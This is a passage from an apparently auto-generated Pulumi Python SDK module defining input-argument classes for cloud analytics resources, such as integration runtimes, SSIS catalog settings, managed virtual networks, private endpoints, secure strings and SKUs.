                 staging_linked_service: Optional[pulumi.Input['EntityReferenceArgs']] = None):
        """
        Data-proxy settings for an integration runtime.
        :param pulumi.Input['EntityReferenceArgs'] connect_via: Reference to the runtime to connect via.
        :param pulumi.Input[str] path: Path value.
        :param pulumi.Input['EntityReferenceArgs'] staging_linked_service: Reference to the staging linked service.
        """
        if connect_via is not None:
            pulumi.set(__self__, "connect_via", connect_via)
        if path is not None:
            pulumi.set(__self__, "path", path)
        if staging_linked_service is not None:
            pulumi.set(__self__, "staging_linked_service", staging_linked_service)
    @property
    @pulumi.getter(name="connectVia")
    def connect_via(self) -> Optional[pulumi.Input['EntityReferenceArgs']]:
        """Reference to the runtime to connect via."""
        return pulumi.get(self, "connect_via")
    @connect_via.setter
    def connect_via(self, value: Optional[pulumi.Input['EntityReferenceArgs']]):
        pulumi.set(self, "connect_via", value)
    @property
    @pulumi.getter
    def path(self) -> Optional[pulumi.Input[str]]:
        """Path value."""
        return pulumi.get(self, "path")
    @path.setter
    def path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "path", value)
    @property
    @pulumi.getter(name="stagingLinkedService")
    def staging_linked_service(self) -> Optional[pulumi.Input['EntityReferenceArgs']]:
        """Reference to the staging linked service."""
        return pulumi.get(self, "staging_linked_service")
    @staging_linked_service.setter
    def staging_linked_service(self, value: Optional[pulumi.Input['EntityReferenceArgs']]):
        pulumi.set(self, "staging_linked_service", value)
@pulumi.input_type
class IntegrationRuntimeSsisCatalogInfoArgs:
    def __init__(__self__, *,
                 catalog_admin_password: Optional[pulumi.Input['SecureStringArgs']] = None,
                 catalog_admin_user_name: Optional[pulumi.Input[str]] = None,
                 catalog_pricing_tier: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']]] = None,
                 catalog_server_endpoint: Optional[pulumi.Input[str]] = None):
        """
        SSIS catalog information for an integration runtime.
        :param pulumi.Input['SecureStringArgs'] catalog_admin_password: Secure catalog admin password.
        :param pulumi.Input[str] catalog_admin_user_name: Catalog admin user name.
        :param pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']] catalog_pricing_tier: Catalog pricing tier.
        :param pulumi.Input[str] catalog_server_endpoint: Catalog server endpoint.
        """
        if catalog_admin_password is not None:
            pulumi.set(__self__, "catalog_admin_password", catalog_admin_password)
        if catalog_admin_user_name is not None:
            pulumi.set(__self__, "catalog_admin_user_name", catalog_admin_user_name)
        if catalog_pricing_tier is not None:
            pulumi.set(__self__, "catalog_pricing_tier", catalog_pricing_tier)
        if catalog_server_endpoint is not None:
            pulumi.set(__self__, "catalog_server_endpoint", catalog_server_endpoint)
    @property
    @pulumi.getter(name="catalogAdminPassword")
    def catalog_admin_password(self) -> Optional[pulumi.Input['SecureStringArgs']]:
        """Secure catalog admin password."""
        return pulumi.get(self, "catalog_admin_password")
    @catalog_admin_password.setter
    def catalog_admin_password(self, value: Optional[pulumi.Input['SecureStringArgs']]):
        pulumi.set(self, "catalog_admin_password", value)
    @property
    @pulumi.getter(name="catalogAdminUserName")
    def catalog_admin_user_name(self) -> Optional[pulumi.Input[str]]:
        """Catalog admin user name."""
        return pulumi.get(self, "catalog_admin_user_name")
    @catalog_admin_user_name.setter
    def catalog_admin_user_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "catalog_admin_user_name", value)
    @property
    @pulumi.getter(name="catalogPricingTier")
    def catalog_pricing_tier(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']]]:
        """Catalog pricing tier."""
        return pulumi.get(self, "catalog_pricing_tier")
    @catalog_pricing_tier.setter
    def catalog_pricing_tier(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']]]):
        pulumi.set(self, "catalog_pricing_tier", value)
    @property
    @pulumi.getter(name="catalogServerEndpoint")
    def catalog_server_endpoint(self) -> Optional[pulumi.Input[str]]:
        """Catalog server endpoint."""
        return pulumi.get(self, "catalog_server_endpoint")
    @catalog_server_endpoint.setter
    def catalog_server_endpoint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "catalog_server_endpoint", value)
@pulumi.input_type
class IntegrationRuntimeSsisPropertiesArgs:
    def __init__(__self__, *,
                 catalog_info: Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']] = None,
                 custom_setup_script_properties: Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']] = None,
                 data_proxy_properties: Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']] = None,
                 edition: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEdition']]] = None,
                 express_custom_setup_properties: Optional[pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]]] = None,
                 license_type: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']]] = None):
        """
        SSIS settings for an integration runtime.
        :param pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs'] catalog_info: SSIS catalog information.
        :param pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs'] custom_setup_script_properties: Custom setup script settings.
        :param pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs'] data_proxy_properties: Data-proxy settings.
        :param pulumi.Input[Union[str, 'IntegrationRuntimeEdition']] edition: Edition.
        :param pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]] express_custom_setup_properties: Express custom-setup steps.
        :param pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']] license_type: License type.
        """
        if catalog_info is not None:
            pulumi.set(__self__, "catalog_info", catalog_info)
        if custom_setup_script_properties is not None:
            pulumi.set(__self__, "custom_setup_script_properties", custom_setup_script_properties)
        if data_proxy_properties is not None:
            pulumi.set(__self__, "data_proxy_properties", data_proxy_properties)
        if edition is not None:
            pulumi.set(__self__, "edition", edition)
        if express_custom_setup_properties is not None:
            pulumi.set(__self__, "express_custom_setup_properties", express_custom_setup_properties)
        if license_type is not None:
            pulumi.set(__self__, "license_type", license_type)
    @property
    @pulumi.getter(name="catalogInfo")
    def catalog_info(self) -> Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']]:
        """SSIS catalog information."""
        return pulumi.get(self, "catalog_info")
    @catalog_info.setter
    def catalog_info(self, value: Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']]):
        pulumi.set(self, "catalog_info", value)
    @property
    @pulumi.getter(name="customSetupScriptProperties")
    def custom_setup_script_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']]:
        """Custom setup script settings."""
        return pulumi.get(self, "custom_setup_script_properties")
    @custom_setup_script_properties.setter
    def custom_setup_script_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']]):
        pulumi.set(self, "custom_setup_script_properties", value)
    @property
    @pulumi.getter(name="dataProxyProperties")
    def data_proxy_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']]:
        """Data-proxy settings."""
        return pulumi.get(self, "data_proxy_properties")
    @data_proxy_properties.setter
    def data_proxy_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']]):
        pulumi.set(self, "data_proxy_properties", value)
    @property
    @pulumi.getter
    def edition(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEdition']]]:
        """Edition."""
        return pulumi.get(self, "edition")
    @edition.setter
    def edition(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEdition']]]):
        pulumi.set(self, "edition", value)
    @property
    @pulumi.getter(name="expressCustomSetupProperties")
    def express_custom_setup_properties(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]]]:
        """Express custom-setup steps."""
        return pulumi.get(self, "express_custom_setup_properties")
    @express_custom_setup_properties.setter
    def express_custom_setup_properties(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]]]):
        pulumi.set(self, "express_custom_setup_properties", value)
    @property
    @pulumi.getter(name="licenseType")
    def license_type(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']]]:
        """License type."""
        return pulumi.get(self, "license_type")
    @license_type.setter
    def license_type(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']]]):
        pulumi.set(self, "license_type", value)
@pulumi.input_type
class IntegrationRuntimeVNetPropertiesArgs:
    def __init__(__self__, *,
                 public_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet: Optional[pulumi.Input[str]] = None,
                 v_net_id: Optional[pulumi.Input[str]] = None):
        """
        Virtual-network settings for an integration runtime.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] public_ips: Public IP addresses.
        :param pulumi.Input[str] subnet: Subnet name.
        :param pulumi.Input[str] v_net_id: Virtual network ID.
        """
        if public_ips is not None:
            pulumi.set(__self__, "public_ips", public_ips)
        if subnet is not None:
            pulumi.set(__self__, "subnet", subnet)
        if v_net_id is not None:
            pulumi.set(__self__, "v_net_id", v_net_id)
    @property
    @pulumi.getter(name="publicIPs")
    def public_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """Public IP addresses."""
        return pulumi.get(self, "public_ips")
    @public_ips.setter
    def public_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "public_ips", value)
    @property
    @pulumi.getter
    def subnet(self) -> Optional[pulumi.Input[str]]:
        """Subnet name."""
        return pulumi.get(self, "subnet")
    @subnet.setter
    def subnet(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet", value)
    @property
    @pulumi.getter(name="vNetId")
    def v_net_id(self) -> Optional[pulumi.Input[str]]:
        """Virtual network ID."""
        return pulumi.get(self, "v_net_id")
    @v_net_id.setter
    def v_net_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "v_net_id", value)
@pulumi.input_type
class LibraryInfoArgs:
    def __init__(__self__, *,
                 container_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 path: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 uploaded_timestamp: Optional[pulumi.Input[str]] = None):
        """
        Information about a library.
        :param pulumi.Input[str] container_name: Storage container name.
        :param pulumi.Input[str] name: Library name.
        :param pulumi.Input[str] path: Library path.
        :param pulumi.Input[str] type: Library type.
        :param pulumi.Input[str] uploaded_timestamp: Upload timestamp.
        """
        if container_name is not None:
            pulumi.set(__self__, "container_name", container_name)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if path is not None:
            pulumi.set(__self__, "path", path)
        if type is not None:
            pulumi.set(__self__, "type", type)
        if uploaded_timestamp is not None:
            pulumi.set(__self__, "uploaded_timestamp", uploaded_timestamp)
    @property
    @pulumi.getter(name="containerName")
    def container_name(self) -> Optional[pulumi.Input[str]]:
        """Storage container name."""
        return pulumi.get(self, "container_name")
    @container_name.setter
    def container_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "container_name", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """Library name."""
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def path(self) -> Optional[pulumi.Input[str]]:
        """Library path."""
        return pulumi.get(self, "path")
    @path.setter
    def path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "path", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """Library type."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter(name="uploadedTimestamp")
    def uploaded_timestamp(self) -> Optional[pulumi.Input[str]]:
        """Upload timestamp."""
        return pulumi.get(self, "uploaded_timestamp")
    @uploaded_timestamp.setter
    def uploaded_timestamp(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "uploaded_timestamp", value)
@pulumi.input_type
class LibraryRequirementsArgs:
    """Input args holding a requirements file: its content and filename (both optional)."""
    def __init__(__self__, *,
                 content: Optional[pulumi.Input[str]] = None,
                 filename: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] content: Text content of the requirements file.
        :param pulumi.Input[str] filename: Name of the requirements file.
        """
        if content is not None:
            pulumi.set(__self__, "content", content)
        if filename is not None:
            pulumi.set(__self__, "filename", filename)
    @property
    @pulumi.getter
    def content(self) -> Optional[pulumi.Input[str]]:
        """Input property 'content'."""
        return pulumi.get(self, "content")
    @content.setter
    def content(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "content", value)
    @property
    @pulumi.getter
    def filename(self) -> Optional[pulumi.Input[str]]:
        """Input property 'filename'."""
        return pulumi.get(self, "filename")
    @filename.setter
    def filename(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "filename", value)
@pulumi.input_type
class LinkedIntegrationRuntimeKeyAuthorizationArgs:
    """Key-based authorization for a linked integration runtime.

    The discriminator 'authorization_type' is always stored as the literal
    'Key' regardless of the value passed (generated-SDK convention).
    """
    def __init__(__self__, *,
                 authorization_type: pulumi.Input[str],
                 key: pulumi.Input['SecureStringArgs']):
        """
        :param pulumi.Input[str] authorization_type: Discriminator; the passed value is ignored and 'Key' is stored.
        :param pulumi.Input['SecureStringArgs'] key: Secure key used for authorization.
        """
        # NOTE: the argument is intentionally ignored; 'Key' is hard-coded.
        pulumi.set(__self__, "authorization_type", 'Key')
        pulumi.set(__self__, "key", key)
    @property
    @pulumi.getter(name="authorizationType")
    def authorization_type(self) -> pulumi.Input[str]:
        """Input property 'authorizationType' (always 'Key' when set via __init__)."""
        return pulumi.get(self, "authorization_type")
    @authorization_type.setter
    def authorization_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "authorization_type", value)
    @property
    @pulumi.getter
    def key(self) -> pulumi.Input['SecureStringArgs']:
        """Input property 'key'."""
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: pulumi.Input['SecureStringArgs']):
        pulumi.set(self, "key", value)
@pulumi.input_type
class LinkedIntegrationRuntimeRbacAuthorizationArgs:
    """RBAC-based authorization for a linked integration runtime.

    The discriminator 'authorization_type' is always stored as the literal
    'RBAC' regardless of the value passed (generated-SDK convention).
    """
    def __init__(__self__, *,
                 authorization_type: pulumi.Input[str],
                 resource_id: pulumi.Input[str]):
        """
        :param pulumi.Input[str] authorization_type: Discriminator; the passed value is ignored and 'RBAC' is stored.
        :param pulumi.Input[str] resource_id: Resource id used for RBAC authorization.
        """
        # NOTE: the argument is intentionally ignored; 'RBAC' is hard-coded.
        pulumi.set(__self__, "authorization_type", 'RBAC')
        pulumi.set(__self__, "resource_id", resource_id)
    @property
    @pulumi.getter(name="authorizationType")
    def authorization_type(self) -> pulumi.Input[str]:
        """Input property 'authorizationType' (always 'RBAC' when set via __init__)."""
        return pulumi.get(self, "authorization_type")
    @authorization_type.setter
    def authorization_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "authorization_type", value)
    @property
    @pulumi.getter(name="resourceId")
    def resource_id(self) -> pulumi.Input[str]:
        """Input property 'resourceId'."""
        return pulumi.get(self, "resource_id")
    @resource_id.setter
    def resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_id", value)
@pulumi.input_type
class ManagedIdentityArgs:
    """Input args for a managed identity; only the identity type is configurable."""
    def __init__(__self__, *,
                 type: Optional[pulumi.Input['ResourceIdentityType']] = None):
        """
        :param pulumi.Input['ResourceIdentityType'] type: Identity type; omitted from the property bag when None.
        """
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
        """Input property 'type'."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class ManagedIntegrationRuntimeArgs:
    """Input args for a managed integration runtime.

    The discriminator 'type' is always stored as the literal 'Managed'
    regardless of the value passed (generated-SDK convention).
    """
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 compute_properties: Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 managed_virtual_network: Optional[pulumi.Input['ManagedVirtualNetworkReferenceArgs']] = None,
                 ssis_properties: Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']] = None):
        """
        :param pulumi.Input[str] type: Discriminator; the passed value is ignored and 'Managed' is stored.
        :param pulumi.Input['IntegrationRuntimeComputePropertiesArgs'] compute_properties: Wire property 'computeProperties'.
        :param pulumi.Input[str] description: Free-text description.
        :param pulumi.Input['ManagedVirtualNetworkReferenceArgs'] managed_virtual_network: Wire property 'managedVirtualNetwork'.
        :param pulumi.Input['IntegrationRuntimeSsisPropertiesArgs'] ssis_properties: Wire property 'ssisProperties'.
        """
        # NOTE: the argument is intentionally ignored; 'Managed' is hard-coded.
        pulumi.set(__self__, "type", 'Managed')
        if compute_properties is not None:
            pulumi.set(__self__, "compute_properties", compute_properties)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if managed_virtual_network is not None:
            pulumi.set(__self__, "managed_virtual_network", managed_virtual_network)
        if ssis_properties is not None:
            pulumi.set(__self__, "ssis_properties", ssis_properties)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """Input property 'type' (always 'Managed' when set via __init__)."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter(name="computeProperties")
    def compute_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']]:
        """Input property 'computeProperties'."""
        return pulumi.get(self, "compute_properties")
    @compute_properties.setter
    def compute_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']]):
        pulumi.set(self, "compute_properties", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """Input property 'description'."""
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="managedVirtualNetwork")
    def managed_virtual_network(self) -> Optional[pulumi.Input['ManagedVirtualNetworkReferenceArgs']]:
        """Input property 'managedVirtualNetwork'."""
        return pulumi.get(self, "managed_virtual_network")
    @managed_virtual_network.setter
    def managed_virtual_network(self, value: Optional[pulumi.Input['ManagedVirtualNetworkReferenceArgs']]):
        pulumi.set(self, "managed_virtual_network", value)
    @property
    @pulumi.getter(name="ssisProperties")
    def ssis_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']]:
        """Input property 'ssisProperties'."""
        return pulumi.get(self, "ssis_properties")
    @ssis_properties.setter
    def ssis_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']]):
        pulumi.set(self, "ssis_properties", value)
@pulumi.input_type
class ManagedVirtualNetworkReferenceArgs:
    """Reference to a managed virtual network by name and reference type (both required)."""
    def __init__(__self__, *,
                 reference_name: pulumi.Input[str],
                 type: pulumi.Input[str]):
        """
        :param pulumi.Input[str] reference_name: Wire property 'referenceName'.
        :param pulumi.Input[str] type: Reference type; stored as given (not hard-coded here).
        """
        pulumi.set(__self__, "reference_name", reference_name)
        pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter(name="referenceName")
    def reference_name(self) -> pulumi.Input[str]:
        """Input property 'referenceName'."""
        return pulumi.get(self, "reference_name")
    @reference_name.setter
    def reference_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "reference_name", value)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """Input property 'type'."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class ManagedVirtualNetworkSettingsArgs:
    """Settings for a managed virtual network: allowed AAD tenants, access checks and
    data-exfiltration prevention. All fields optional."""
    def __init__(__self__, *,
                 allowed_aad_tenant_ids_for_linking: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 linked_access_check_on_target_resource: Optional[pulumi.Input[bool]] = None,
                 prevent_data_exfiltration: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_aad_tenant_ids_for_linking: Wire property 'allowedAadTenantIdsForLinking'.
        :param pulumi.Input[bool] linked_access_check_on_target_resource: Wire property 'linkedAccessCheckOnTargetResource'.
        :param pulumi.Input[bool] prevent_data_exfiltration: Wire property 'preventDataExfiltration'.
        """
        if allowed_aad_tenant_ids_for_linking is not None:
            pulumi.set(__self__, "allowed_aad_tenant_ids_for_linking", allowed_aad_tenant_ids_for_linking)
        if linked_access_check_on_target_resource is not None:
            pulumi.set(__self__, "linked_access_check_on_target_resource", linked_access_check_on_target_resource)
        if prevent_data_exfiltration is not None:
            pulumi.set(__self__, "prevent_data_exfiltration", prevent_data_exfiltration)
    @property
    @pulumi.getter(name="allowedAadTenantIdsForLinking")
    def allowed_aad_tenant_ids_for_linking(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """Input property 'allowedAadTenantIdsForLinking'."""
        return pulumi.get(self, "allowed_aad_tenant_ids_for_linking")
    @allowed_aad_tenant_ids_for_linking.setter
    def allowed_aad_tenant_ids_for_linking(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "allowed_aad_tenant_ids_for_linking", value)
    @property
    @pulumi.getter(name="linkedAccessCheckOnTargetResource")
    def linked_access_check_on_target_resource(self) -> Optional[pulumi.Input[bool]]:
        """Input property 'linkedAccessCheckOnTargetResource'."""
        return pulumi.get(self, "linked_access_check_on_target_resource")
    @linked_access_check_on_target_resource.setter
    def linked_access_check_on_target_resource(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "linked_access_check_on_target_resource", value)
    @property
    @pulumi.getter(name="preventDataExfiltration")
    def prevent_data_exfiltration(self) -> Optional[pulumi.Input[bool]]:
        """Input property 'preventDataExfiltration'."""
        return pulumi.get(self, "prevent_data_exfiltration")
    @prevent_data_exfiltration.setter
    def prevent_data_exfiltration(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "prevent_data_exfiltration", value)
@pulumi.input_type
class PrivateEndpointConnectionArgs:
    """Input args for a private endpoint connection; only the connection state is configurable."""
    def __init__(__self__, *,
                 private_link_service_connection_state: Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']] = None):
        """
        :param pulumi.Input['PrivateLinkServiceConnectionStateArgs'] private_link_service_connection_state: Wire property 'privateLinkServiceConnectionState'.
        """
        if private_link_service_connection_state is not None:
            pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)
    @property
    @pulumi.getter(name="privateLinkServiceConnectionState")
    def private_link_service_connection_state(self) -> Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']]:
        """Input property 'privateLinkServiceConnectionState'."""
        return pulumi.get(self, "private_link_service_connection_state")
    @private_link_service_connection_state.setter
    def private_link_service_connection_state(self, value: Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']]):
        pulumi.set(self, "private_link_service_connection_state", value)
@pulumi.input_type
class PrivateLinkServiceConnectionStateArgs:
    """Connection state of a private link service: description and status (both optional)."""
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] description: Free-text description of the state.
        :param pulumi.Input[str] status: Status value.
        """
        if description is not None:
            pulumi.set(__self__, "description", description)
        if status is not None:
            pulumi.set(__self__, "status", status)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """Input property 'description'."""
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """Input property 'status'."""
        return pulumi.get(self, "status")
    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)
@pulumi.input_type
class PurviewConfigurationArgs:
    """Input args for Purview configuration; only the Purview resource id is configurable."""
    def __init__(__self__, *,
                 purview_resource_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] purview_resource_id: Wire property 'purviewResourceId'.
        """
        if purview_resource_id is not None:
            pulumi.set(__self__, "purview_resource_id", purview_resource_id)
    @property
    @pulumi.getter(name="purviewResourceId")
    def purview_resource_id(self) -> Optional[pulumi.Input[str]]:
        """Input property 'purviewResourceId'."""
        return pulumi.get(self, "purview_resource_id")
    @purview_resource_id.setter
    def purview_resource_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "purview_resource_id", value)
@pulumi.input_type
class SecureStringArgs:
    """A secure string value.

    The discriminator 'type' is always stored as the literal 'SecureString'
    regardless of the value passed (generated-SDK convention).
    """
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 value: pulumi.Input[str]):
        """
        :param pulumi.Input[str] type: Discriminator; the passed value is ignored and 'SecureString' is stored.
        :param pulumi.Input[str] value: The secret string value.
        """
        # NOTE: the argument is intentionally ignored; 'SecureString' is hard-coded.
        pulumi.set(__self__, "type", 'SecureString')
        pulumi.set(__self__, "value", value)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """Input property 'type' (always 'SecureString' when set via __init__)."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """Input property 'value'."""
        return pulumi.get(self, "value")
    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class SelfHostedIntegrationRuntimeArgs:
    """Input args for a self-hosted integration runtime.

    The discriminator 'type' is always stored as the literal 'SelfHosted'
    regardless of the value passed (generated-SDK convention).
    """
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None,
                 linked_info: Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']]] = None):
        """
        :param pulumi.Input[str] type: Discriminator; the passed value is ignored and 'SelfHosted' is stored.
        :param pulumi.Input[str] description: Free-text description.
        :param linked_info: Key- or RBAC-based linked runtime authorization; wire property 'linkedInfo'.
        """
        # NOTE: the argument is intentionally ignored; 'SelfHosted' is hard-coded.
        pulumi.set(__self__, "type", 'SelfHosted')
        if description is not None:
            pulumi.set(__self__, "description", description)
        if linked_info is not None:
            pulumi.set(__self__, "linked_info", linked_info)
    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """Input property 'type' (always 'SelfHosted' when set via __init__)."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """Input property 'description'."""
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="linkedInfo")
    def linked_info(self) -> Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']]]:
        """Input property 'linkedInfo'."""
        return pulumi.get(self, "linked_info")
    @linked_info.setter
    def linked_info(self, value: Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']]]):
        pulumi.set(self, "linked_info", value)
@pulumi.input_type
class SkuArgs:
    """SKU description: capacity, name and tier (all optional)."""
    def __init__(__self__, *,
                 capacity: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 tier: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[int] capacity: SKU capacity.
        :param pulumi.Input[str] name: SKU name.
        :param pulumi.Input[str] tier: SKU tier.
        """
        if capacity is not None:
            pulumi.set(__self__, "capacity", capacity)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if tier is not None:
            pulumi.set(__self__, "tier", tier)
    @property
    @pulumi.getter
    def capacity(self) -> Optional[pulumi.Input[int]]:
        """Input property 'capacity'."""
        return pulumi.get(self, "capacity")
    @capacity.setter
    def capacity(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "capacity", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """Input property 'name'."""
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def tier(self) -> Optional[pulumi.Input[str]]:
        """Input property 'tier'."""
        return pulumi.get(self, "tier")
    @tier.setter
    def tier(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tier", value)
@pulumi.input_type
class SqlPoolVulnerabilityAssessmentRuleBaselineItemArgs:
    """A single vulnerability-assessment rule baseline item; 'result' is required."""
    def __init__(__self__, *,
                 result: pulumi.Input[Sequence[pulumi.Input[str]]]):
        """
        :param pulumi.Input[Sequence[pulumi.Input[str]]] result: Baseline result row (list of strings).
        """
        pulumi.set(__self__, "result", result)
    @property
    @pulumi.getter
